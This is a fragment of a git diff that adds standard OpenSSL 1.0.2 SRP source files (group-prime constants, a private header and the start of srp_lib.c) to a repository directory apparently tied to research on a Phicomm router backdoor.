+    bn_pack4(0x8AEA, 0x7157, 0x5D06, 0x0C7D),
+    bn_pack4(0xECFB, 0x8504, 0x58DB, 0xEF0A),
+    bn_pack4(0xA855, 0x21AB, 0xDF1C, 0xBA64),
+    bn_pack4(0xAD33, 0x170D, 0x0450, 0x7A33),
+    bn_pack4(0x1572, 0x8E5A, 0x8AAA, 0xC42D),
+    bn_pack4(0x15D2, 0x2618, 0x98FA, 0x0510),
+    bn_pack4(0x3995, 0x497C, 0xEA95, 0x6AE5),
+    bn_pack4(0xDE2B, 0xCBF6, 0x9558, 0x1718),
+    bn_pack4(0xB5C5, 0x5DF0, 0x6F4C, 0x52C9),
+    bn_pack4(0x9B27, 0x83A2, 0xEC07, 0xA28F),
+    bn_pack4(0xE39E, 0x772C, 0x180E, 0x8603),
+    bn_pack4(0x3290, 0x5E46, 0x2E36, 0xCE3B),
+    bn_pack4(0xF174, 0x6C08, 0xCA18, 0x217C),
+    bn_pack4(0x670C, 0x354E, 0x4ABC, 0x9804),
+    bn_pack4(0x9ED5, 0x2907, 0x7096, 0x966D),
+    bn_pack4(0x1C62, 0xF356, 0x2085, 0x52BB),
+    bn_pack4(0x8365, 0x5D23, 0xDCA3, 0xAD96),
+    bn_pack4(0x6916, 0x3FA8, 0xFD24, 0xCF5F),
+    bn_pack4(0x98DA, 0x4836, 0x1C55, 0xD39A),
+    bn_pack4(0xC200, 0x7CB8, 0xA163, 0xBF05),
+    bn_pack4(0x4928, 0x6651, 0xECE4, 0x5B3D),
+    bn_pack4(0xAE9F, 0x2411, 0x7C4B, 0x1FE6),
+    bn_pack4(0xEE38, 0x6BFB, 0x5A89, 0x9FA5),
+    bn_pack4(0x0BFF, 0x5CB6, 0xF406, 0xB7ED),
+    bn_pack4(0xF44C, 0x42E9, 0xA637, 0xED6B),
+    bn_pack4(0xE485, 0xB576, 0x625E, 0x7EC6),
+    bn_pack4(0x4FE1, 0x356D, 0x6D51, 0xC245),
+    bn_pack4(0x302B, 0x0A6D, 0xF25F, 0x1437),
+    bn_pack4(0xEF95, 0x19B3, 0xCD3A, 0x431B),
+    bn_pack4(0x514A, 0x0879, 0x8E34, 0x04DD),
+    bn_pack4(0x020B, 0xBEA6, 0x3B13, 0x9B22),
+    bn_pack4(0x2902, 0x4E08, 0x8A67, 0xCC74),
+    bn_pack4(0xC4C6, 0x628B, 0x80DC, 0x1CD1),
+    bn_pack4(0xC90F, 0xDAA2, 0x2168, 0xC234),
+    bn_pack4(0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF)
+};
+
+static BIGNUM bn_group_4096 = {
+    bn_group_4096_value,
+    (sizeof bn_group_4096_value) / sizeof(BN_ULONG),
+    (sizeof bn_group_4096_value) / sizeof(BN_ULONG),
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static BN_ULONG bn_group_6144_value[] = {
+    bn_pack4(0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF),
+    bn_pack4(0xE694, 0xF91E, 0x6DCC, 0x4024),
+    bn_pack4(0x12BF, 0x2D5B, 0x0B74, 0x74D6),
+    bn_pack4(0x043E, 0x8F66, 0x3F48, 0x60EE),
+    bn_pack4(0x387F, 0xE8D7, 0x6E3C, 0x0468),
+    bn_pack4(0xDA56, 0xC9EC, 0x2EF2, 0x9632),
+    bn_pack4(0xEB19, 0xCCB1, 0xA313, 0xD55C),
+    bn_pack4(0xF550, 0xAA3D, 0x8A1F, 0xBFF0),
+    bn_pack4(0x06A1, 0xD58B, 0xB7C5, 0xDA76),
+    bn_pack4(0xA797, 0x15EE, 0xF29B, 0xE328),
+    bn_pack4(0x14CC, 0x5ED2, 0x0F80, 0x37E0),
+    bn_pack4(0xCC8F, 0x6D7E, 0xBF48, 0xE1D8),
+    bn_pack4(0x4BD4, 0x07B2, 0x2B41, 0x54AA),
+    bn_pack4(0x0F1D, 0x45B7, 0xFF58, 0x5AC5),
+    bn_pack4(0x23A9, 0x7A7E, 0x36CC, 0x88BE),
+    bn_pack4(0x59E7, 0xC97F, 0xBEC7, 0xE8F3),
+    bn_pack4(0xB5A8, 0x4031, 0x900B, 0x1C9E),
+    bn_pack4(0xD55E, 0x702F, 0x4698, 0x0C82),
+    bn_pack4(0xF482, 0xD7CE, 0x6E74, 0xFEF6),
+    bn_pack4(0xF032, 0xEA15, 0xD172, 0x1D03),
+    bn_pack4(0x5983, 0xCA01, 0xC64B, 0x92EC),
+    bn_pack4(0x6FB8, 0xF401, 0x378C, 0xD2BF),
+    bn_pack4(0x3320, 0x5151, 0x2BD7, 0xAF42),
+    bn_pack4(0xDB7F, 0x1447, 0xE6CC, 0x254B),
+    bn_pack4(0x44CE, 0x6CBA, 0xCED4, 0xBB1B),
+    bn_pack4(0xDA3E, 0xDBEB, 0xCF9B, 0x14ED),
+    bn_pack4(0x1797, 0x27B0, 0x865A, 0x8918),
+    bn_pack4(0xB06A, 0x53ED, 0x9027, 0xD831),
+    bn_pack4(0xE5DB, 0x382F, 0x4130, 0x01AE),
+    bn_pack4(0xF8FF, 0x9406, 0xAD9E, 0x530E),
+    bn_pack4(0xC975, 0x1E76, 0x3DBA, 0x37BD),
+    bn_pack4(0xC1D4, 0xDCB2, 0x6026, 0x46DE),
+    bn_pack4(0x36C3, 0xFAB4, 0xD27C, 0x7026),
+    bn_pack4(0x4DF4, 0x35C9, 0x3402, 0x8492),
+    bn_pack4(0x86FF, 0xB7DC, 0x90A6, 0xC08F),
+    bn_pack4(0x93B4, 0xEA98, 0x8D8F, 0xDDC1),
+    bn_pack4(0xD006, 0x9127, 0xD5B0, 0x5AA9),
+    bn_pack4(0xB81B, 0xDD76, 0x2170, 0x481C),
+    bn_pack4(0x1F61, 0x2970, 0xCEE2, 0xD7AF),
+    bn_pack4(0x233B, 0xA186, 0x515B, 0xE7ED),
+    bn_pack4(0x99B2, 0x964F, 0xA090, 0xC3A2),
+    bn_pack4(0x287C, 0x5947, 0x4E6B, 0xC05D),
+    bn_pack4(0x2E8E, 0xFC14, 0x1FBE, 0xCAA6),
+    bn_pack4(0xDBBB, 0xC2DB, 0x04DE, 0x8EF9),
+    bn_pack4(0x2583, 0xE9CA, 0x2AD4, 0x4CE8),
+    bn_pack4(0x1A94, 0x6834, 0xB615, 0x0BDA),
+    bn_pack4(0x99C3, 0x2718, 0x6AF4, 0xE23C),
+    bn_pack4(0x8871, 0x9A10, 0xBDBA, 0x5B26),
+    bn_pack4(0x1A72, 0x3C12, 0xA787, 0xE6D7),
+    bn_pack4(0x4B82, 0xD120, 0xA921, 0x0801),
+    bn_pack4(0x43DB, 0x5BFC, 0xE0FD, 0x108E),
+    bn_pack4(0x08E2, 0x4FA0, 0x74E5, 0xAB31),
+    bn_pack4(0x7709, 0x88C0, 0xBAD9, 0x46E2),
+    bn_pack4(0xBBE1, 0x1757, 0x7A61, 0x5D6C),
+    bn_pack4(0x521F, 0x2B18, 0x177B, 0x200C),
+    bn_pack4(0xD876, 0x0273, 0x3EC8, 0x6A64),
+    bn_pack4(0xF12F, 0xFA06, 0xD98A, 0x0864),
+    bn_pack4(0xCEE3, 0xD226, 0x1AD2, 0xEE6B),
+    bn_pack4(0x1E8C, 0x94E0, 0x4A25, 0x619D),
+    bn_pack4(0xABF5, 0xAE8C, 0xDB09, 0x33D7),
+    bn_pack4(0xB397, 0x0F85, 0xA6E1, 0xE4C7),
+    bn_pack4(0x8AEA, 0x7157, 0x5D06, 0x0C7D),
+    bn_pack4(0xECFB, 0x8504, 0x58DB, 0xEF0A),
+    bn_pack4(0xA855, 0x21AB, 0xDF1C, 0xBA64),
+    bn_pack4(0xAD33, 0x170D, 0x0450, 0x7A33),
+    bn_pack4(0x1572, 0x8E5A, 0x8AAA, 0xC42D),
+    bn_pack4(0x15D2, 0x2618, 0x98FA, 0x0510),
+    bn_pack4(0x3995, 0x497C, 0xEA95, 0x6AE5),
+    bn_pack4(0xDE2B, 0xCBF6, 0x9558, 0x1718),
+    bn_pack4(0xB5C5, 0x5DF0, 0x6F4C, 0x52C9),
+    bn_pack4(0x9B27, 0x83A2, 0xEC07, 0xA28F),
+    bn_pack4(0xE39E, 0x772C, 0x180E, 0x8603),
+    bn_pack4(0x3290, 0x5E46, 0x2E36, 0xCE3B),
+    bn_pack4(0xF174, 0x6C08, 0xCA18, 0x217C),
+    bn_pack4(0x670C, 0x354E, 0x4ABC, 0x9804),
+    bn_pack4(0x9ED5, 0x2907, 0x7096, 0x966D),
+    bn_pack4(0x1C62, 0xF356, 0x2085, 0x52BB),
+    bn_pack4(0x8365, 0x5D23, 0xDCA3, 0xAD96),
+    bn_pack4(0x6916, 0x3FA8, 0xFD24, 0xCF5F),
+    bn_pack4(0x98DA, 0x4836, 0x1C55, 0xD39A),
+    bn_pack4(0xC200, 0x7CB8, 0xA163, 0xBF05),
+    bn_pack4(0x4928, 0x6651, 0xECE4, 0x5B3D),
+    bn_pack4(0xAE9F, 0x2411, 0x7C4B, 0x1FE6),
+    bn_pack4(0xEE38, 0x6BFB, 0x5A89, 0x9FA5),
+    bn_pack4(0x0BFF, 0x5CB6, 0xF406, 0xB7ED),
+    bn_pack4(0xF44C, 0x42E9, 0xA637, 0xED6B),
+    bn_pack4(0xE485, 0xB576, 0x625E, 0x7EC6),
+    bn_pack4(0x4FE1, 0x356D, 0x6D51, 0xC245),
+    bn_pack4(0x302B, 0x0A6D, 0xF25F, 0x1437),
+    bn_pack4(0xEF95, 0x19B3, 0xCD3A, 0x431B),
+    bn_pack4(0x514A, 0x0879, 0x8E34, 0x04DD),
+    bn_pack4(0x020B, 0xBEA6, 0x3B13, 0x9B22),
+    bn_pack4(0x2902, 0x4E08, 0x8A67, 0xCC74),
+    bn_pack4(0xC4C6, 0x628B, 0x80DC, 0x1CD1),
+    bn_pack4(0xC90F, 0xDAA2, 0x2168, 0xC234),
+    bn_pack4(0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF)
+};
+
+static BIGNUM bn_group_6144 = {
+    bn_group_6144_value,
+    (sizeof bn_group_6144_value) / sizeof(BN_ULONG),
+    (sizeof bn_group_6144_value) / sizeof(BN_ULONG),
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static BN_ULONG bn_group_8192_value[] = {
+    bn_pack4(0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF),
+    bn_pack4(0x60C9, 0x80DD, 0x98ED, 0xD3DF),
+    bn_pack4(0xC81F, 0x56E8, 0x80B9, 0x6E71),
+    bn_pack4(0x9E30, 0x50E2, 0x7656, 0x94DF),
+    bn_pack4(0x9558, 0xE447, 0x5677, 0xE9AA),
+    bn_pack4(0xC919, 0x0DA6, 0xFC02, 0x6E47),
+    bn_pack4(0x889A, 0x002E, 0xD5EE, 0x382B),
+    bn_pack4(0x4009, 0x438B, 0x481C, 0x6CD7),
+    bn_pack4(0x3590, 0x46F4, 0xEB87, 0x9F92),
+    bn_pack4(0xFAF3, 0x6BC3, 0x1ECF, 0xA268),
+    bn_pack4(0xB1D5, 0x10BD, 0x7EE7, 0x4D73),
+    bn_pack4(0xF9AB, 0x4819, 0x5DED, 0x7EA1),
+    bn_pack4(0x64F3, 0x1CC5, 0x0846, 0x851D),
+    bn_pack4(0x4597, 0xE899, 0xA025, 0x5DC1),
+    bn_pack4(0xDF31, 0x0EE0, 0x74AB, 0x6A36),
+    bn_pack4(0x6D2A, 0x13F8, 0x3F44, 0xF82D),
+    bn_pack4(0x062B, 0x3CF5, 0xB3A2, 0x78A6),
+    bn_pack4(0x7968, 0x3303, 0xED5B, 0xDD3A),
+    bn_pack4(0xFA9D, 0x4B7F, 0xA2C0, 0x87E8),
+    bn_pack4(0x4BCB, 0xC886, 0x2F83, 0x85DD),
+    bn_pack4(0x3473, 0xFC64, 0x6CEA, 0x306B),
+    bn_pack4(0x13EB, 0x57A8, 0x1A23, 0xF0C7),
+    bn_pack4(0x2222, 0x2E04, 0xA403, 0x7C07),
+    bn_pack4(0xE3FD, 0xB8BE, 0xFC84, 0x8AD9),
+    bn_pack4(0x238F, 0x16CB, 0xE39D, 0x652D),
+    bn_pack4(0x3423, 0xB474, 0x2BF1, 0xC978),
+    bn_pack4(0x3AAB, 0x639C, 0x5AE4, 0xF568),
+    bn_pack4(0x2576, 0xF693, 0x6BA4, 0x2466),
+    bn_pack4(0x741F, 0xA7BF, 0x8AFC, 0x47ED),
+    bn_pack4(0x3BC8, 0x32B6, 0x8D9D, 0xD300),
+    bn_pack4(0xD8BE, 0xC4D0, 0x73B9, 0x31BA),
+    bn_pack4(0x3877, 0x7CB6, 0xA932, 0xDF8C),
+    bn_pack4(0x74A3, 0x926F, 0x12FE, 0xE5E4),
+    bn_pack4(0xE694, 0xF91E, 0x6DBE, 0x1159),
+    bn_pack4(0x12BF, 0x2D5B, 0x0B74, 0x74D6),
+    bn_pack4(0x043E, 0x8F66, 0x3F48, 0x60EE),
+    bn_pack4(0x387F, 0xE8D7, 0x6E3C, 0x0468),
+    bn_pack4(0xDA56, 0xC9EC, 0x2EF2, 0x9632),
+    bn_pack4(0xEB19, 0xCCB1, 0xA313, 0xD55C),
+    bn_pack4(0xF550, 0xAA3D, 0x8A1F, 0xBFF0),
+    bn_pack4(0x06A1, 0xD58B, 0xB7C5, 0xDA76),
+    bn_pack4(0xA797, 0x15EE, 0xF29B, 0xE328),
+    bn_pack4(0x14CC, 0x5ED2, 0x0F80, 0x37E0),
+    bn_pack4(0xCC8F, 0x6D7E, 0xBF48, 0xE1D8),
+    bn_pack4(0x4BD4, 0x07B2, 0x2B41, 0x54AA),
+    bn_pack4(0x0F1D, 0x45B7, 0xFF58, 0x5AC5),
+    bn_pack4(0x23A9, 0x7A7E, 0x36CC, 0x88BE),
+    bn_pack4(0x59E7, 0xC97F, 0xBEC7, 0xE8F3),
+    bn_pack4(0xB5A8, 0x4031, 0x900B, 0x1C9E),
+    bn_pack4(0xD55E, 0x702F, 0x4698, 0x0C82),
+    bn_pack4(0xF482, 0xD7CE, 0x6E74, 0xFEF6),
+    bn_pack4(0xF032, 0xEA15, 0xD172, 0x1D03),
+    bn_pack4(0x5983, 0xCA01, 0xC64B, 0x92EC),
+    bn_pack4(0x6FB8, 0xF401, 0x378C, 0xD2BF),
+    bn_pack4(0x3320, 0x5151, 0x2BD7, 0xAF42),
+    bn_pack4(0xDB7F, 0x1447, 0xE6CC, 0x254B),
+    bn_pack4(0x44CE, 0x6CBA, 0xCED4, 0xBB1B),
+    bn_pack4(0xDA3E, 0xDBEB, 0xCF9B, 0x14ED),
+    bn_pack4(0x1797, 0x27B0, 0x865A, 0x8918),
+    bn_pack4(0xB06A, 0x53ED, 0x9027, 0xD831),
+    bn_pack4(0xE5DB, 0x382F, 0x4130, 0x01AE),
+    bn_pack4(0xF8FF, 0x9406, 0xAD9E, 0x530E),
+    bn_pack4(0xC975, 0x1E76, 0x3DBA, 0x37BD),
+    bn_pack4(0xC1D4, 0xDCB2, 0x6026, 0x46DE),
+    bn_pack4(0x36C3, 0xFAB4, 0xD27C, 0x7026),
+    bn_pack4(0x4DF4, 0x35C9, 0x3402, 0x8492),
+    bn_pack4(0x86FF, 0xB7DC, 0x90A6, 0xC08F),
+    bn_pack4(0x93B4, 0xEA98, 0x8D8F, 0xDDC1),
+    bn_pack4(0xD006, 0x9127, 0xD5B0, 0x5AA9),
+    bn_pack4(0xB81B, 0xDD76, 0x2170, 0x481C),
+    bn_pack4(0x1F61, 0x2970, 0xCEE2, 0xD7AF),
+    bn_pack4(0x233B, 0xA186, 0x515B, 0xE7ED),
+    bn_pack4(0x99B2, 0x964F, 0xA090, 0xC3A2),
+    bn_pack4(0x287C, 0x5947, 0x4E6B, 0xC05D),
+    bn_pack4(0x2E8E, 0xFC14, 0x1FBE, 0xCAA6),
+    bn_pack4(0xDBBB, 0xC2DB, 0x04DE, 0x8EF9),
+    bn_pack4(0x2583, 0xE9CA, 0x2AD4, 0x4CE8),
+    bn_pack4(0x1A94, 0x6834, 0xB615, 0x0BDA),
+    bn_pack4(0x99C3, 0x2718, 0x6AF4, 0xE23C),
+    bn_pack4(0x8871, 0x9A10, 0xBDBA, 0x5B26),
+    bn_pack4(0x1A72, 0x3C12, 0xA787, 0xE6D7),
+    bn_pack4(0x4B82, 0xD120, 0xA921, 0x0801),
+    bn_pack4(0x43DB, 0x5BFC, 0xE0FD, 0x108E),
+    bn_pack4(0x08E2, 0x4FA0, 0x74E5, 0xAB31),
+    bn_pack4(0x7709, 0x88C0, 0xBAD9, 0x46E2),
+    bn_pack4(0xBBE1, 0x1757, 0x7A61, 0x5D6C),
+    bn_pack4(0x521F, 0x2B18, 0x177B, 0x200C),
+    bn_pack4(0xD876, 0x0273, 0x3EC8, 0x6A64),
+    bn_pack4(0xF12F, 0xFA06, 0xD98A, 0x0864),
+    bn_pack4(0xCEE3, 0xD226, 0x1AD2, 0xEE6B),
+    bn_pack4(0x1E8C, 0x94E0, 0x4A25, 0x619D),
+    bn_pack4(0xABF5, 0xAE8C, 0xDB09, 0x33D7),
+    bn_pack4(0xB397, 0x0F85, 0xA6E1, 0xE4C7),
+    bn_pack4(0x8AEA, 0x7157, 0x5D06, 0x0C7D),
+    bn_pack4(0xECFB, 0x8504, 0x58DB, 0xEF0A),
+    bn_pack4(0xA855, 0x21AB, 0xDF1C, 0xBA64),
+    bn_pack4(0xAD33, 0x170D, 0x0450, 0x7A33),
+    bn_pack4(0x1572, 0x8E5A, 0x8AAA, 0xC42D),
+    bn_pack4(0x15D2, 0x2618, 0x98FA, 0x0510),
+    bn_pack4(0x3995, 0x497C, 0xEA95, 0x6AE5),
+    bn_pack4(0xDE2B, 0xCBF6, 0x9558, 0x1718),
+    bn_pack4(0xB5C5, 0x5DF0, 0x6F4C, 0x52C9),
+    bn_pack4(0x9B27, 0x83A2, 0xEC07, 0xA28F),
+    bn_pack4(0xE39E, 0x772C, 0x180E, 0x8603),
+    bn_pack4(0x3290, 0x5E46, 0x2E36, 0xCE3B),
+    bn_pack4(0xF174, 0x6C08, 0xCA18, 0x217C),
+    bn_pack4(0x670C, 0x354E, 0x4ABC, 0x9804),
+    bn_pack4(0x9ED5, 0x2907, 0x7096, 0x966D),
+    bn_pack4(0x1C62, 0xF356, 0x2085, 0x52BB),
+    bn_pack4(0x8365, 0x5D23, 0xDCA3, 0xAD96),
+    bn_pack4(0x6916, 0x3FA8, 0xFD24, 0xCF5F),
+    bn_pack4(0x98DA, 0x4836, 0x1C55, 0xD39A),
+    bn_pack4(0xC200, 0x7CB8, 0xA163, 0xBF05),
+    bn_pack4(0x4928, 0x6651, 0xECE4, 0x5B3D),
+    bn_pack4(0xAE9F, 0x2411, 0x7C4B, 0x1FE6),
+    bn_pack4(0xEE38, 0x6BFB, 0x5A89, 0x9FA5),
+    bn_pack4(0x0BFF, 0x5CB6, 0xF406, 0xB7ED),
+    bn_pack4(0xF44C, 0x42E9, 0xA637, 0xED6B),
+    bn_pack4(0xE485, 0xB576, 0x625E, 0x7EC6),
+    bn_pack4(0x4FE1, 0x356D, 0x6D51, 0xC245),
+    bn_pack4(0x302B, 0x0A6D, 0xF25F, 0x1437),
+    bn_pack4(0xEF95, 0x19B3, 0xCD3A, 0x431B),
+    bn_pack4(0x514A, 0x0879, 0x8E34, 0x04DD),
+    bn_pack4(0x020B, 0xBEA6, 0x3B13, 0x9B22),
+    bn_pack4(0x2902, 0x4E08, 0x8A67, 0xCC74),
+    bn_pack4(0xC4C6, 0x628B, 0x80DC, 0x1CD1),
+    bn_pack4(0xC90F, 0xDAA2, 0x2168, 0xC234),
+    bn_pack4(0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF)
+};
+
+static BIGNUM bn_group_8192 = {
+    bn_group_8192_value,
+    (sizeof bn_group_8192_value) / sizeof(BN_ULONG),
+    (sizeof bn_group_8192_value) / sizeof(BN_ULONG),
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static BN_ULONG bn_generator_19_value[] = { 19 };
+
+static BIGNUM bn_generator_19 = {
+    bn_generator_19_value,
+    1,
+    1,
+    0,
+    BN_FLG_STATIC_DATA
+};
+static BN_ULONG bn_generator_5_value[] = { 5 };
+
+static BIGNUM bn_generator_5 = {
+    bn_generator_5_value,
+    1,
+    1,
+    0,
+    BN_FLG_STATIC_DATA
+};
+static BN_ULONG bn_generator_2_value[] = { 2 };
+
+static BIGNUM bn_generator_2 = {
+    bn_generator_2_value,
+    1,
+    1,
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static SRP_gN knowngN[] = {
+    {"8192", &bn_generator_19, &bn_group_8192},
+    {"6144", &bn_generator_5, &bn_group_6144},
+    {"4096", &bn_generator_5, &bn_group_4096},
+    {"3072", &bn_generator_5, &bn_group_3072},
+    {"2048", &bn_generator_2, &bn_group_2048},
+    {"1536", &bn_generator_2, &bn_group_1536},
+    {"1024", &bn_generator_2, &bn_group_1024},
+};
+
+#define KNOWN_GN_NUMBER sizeof(knowngN) / sizeof(SRP_gN)
+
+/* end of generated data */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_lcl.h
new file mode 100644
index 0000000..9a7fce1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_lcl.h
@@ -0,0 +1,84 @@
+/* crypto/srp/srp_lcl.h */
+/*
+ * Written by Peter Sylvester (peter.sylvester@edelweb.fr) for the EdelKey
+ * project and contributed to the OpenSSL project 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#ifndef HEADER_SRP_LCL_H
+# define HEADER_SRP_LCL_H
+
+# include <openssl/srp.h>
+# include <openssl/sha.h>
+
+# if 0
+#  define srp_bn_print(a) {fprintf(stderr, #a "="); BN_print_fp(stderr,a); \
+   fprintf(stderr,"\n");}
+# else
+#  define   srp_bn_print(a)
+# endif
+
+
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_lib.c
new file mode 100644
index 0000000..e9a2e05
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_lib.c
@@ -0,0 +1,357 @@
+/* crypto/srp/srp_lib.c */
+/*
+ * Written by Christophe Renou (christophe.renou@edelweb.fr) with the
+ * precious help of Peter Sylvester (peter.sylvester@edelweb.fr) for the
+ * EdelKey project and contributed to the OpenSSL project 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#ifndef OPENSSL_NO_SRP
+# include "cryptlib.h"
+# include "srp_lcl.h"
+# include <openssl/srp.h>
+# include <openssl/evp.h>
+
+# if (BN_BYTES == 8)
+#  if (defined(_WIN32) || defined(_WIN64)) && !defined(__MINGW32__)
+#   define bn_pack4(a1,a2,a3,a4) ((a1##UI64<<48)|(a2##UI64<<32)|(a3##UI64<<16)|a4##UI64)
+#  elif defined(__arch64__)
+#   define bn_pack4(a1,a2,a3,a4) ((a1##UL<<48)|(a2##UL<<32)|(a3##UL<<16)|a4##UL)
+#  else
+#   define bn_pack4(a1,a2,a3,a4) ((a1##ULL<<48)|(a2##ULL<<32)|(a3##ULL<<16)|a4##ULL)
+#  endif
+# elif (BN_BYTES == 4)
+#  define bn_pack4(a1,a2,a3,a4)  ((a3##UL<<16)|a4##UL), ((a1##UL<<16)|a2##UL)
+# else
+#  error "unsupported BN_BYTES"
+# endif
+
+# include "srp_grps.h"
+
+static BIGNUM *srp_Calc_k(BIGNUM *N, BIGNUM *g)
+{
+    /* k = SHA1(N | PAD(g)) -- tls-srp draft 8 */
+
+    unsigned char digest[SHA_DIGEST_LENGTH];
+    unsigned char *tmp;
+    EVP_MD_CTX ctxt;
+    int longg;
+    int longN = BN_num_bytes(N);
+
+    if (BN_ucmp(g, N) >= 0)
+        return NULL;
+
+    if ((tmp = OPENSSL_malloc(longN)) == NULL)
+        return NULL;
+    BN_bn2bin(N, tmp);
+
+    EVP_MD_CTX_init(&ctxt);
+    EVP_DigestInit_ex(&ctxt, EVP_sha1(), NULL);
+    EVP_DigestUpdate(&ctxt, tmp, longN);
+
+    memset(tmp, 0, longN);
+    longg = BN_bn2bin(g, tmp);
+    /* use the zeros behind to pad on left */
+    EVP_DigestUpdate(&ctxt, tmp + longg, longN - longg);
+    EVP_DigestUpdate(&ctxt, tmp, longg);
+    OPENSSL_free(tmp);
+
+    EVP_DigestFinal_ex(&ctxt, digest, NULL);
+    EVP_MD_CTX_cleanup(&ctxt);
+    return BN_bin2bn(digest, sizeof(digest), NULL);
+}
+
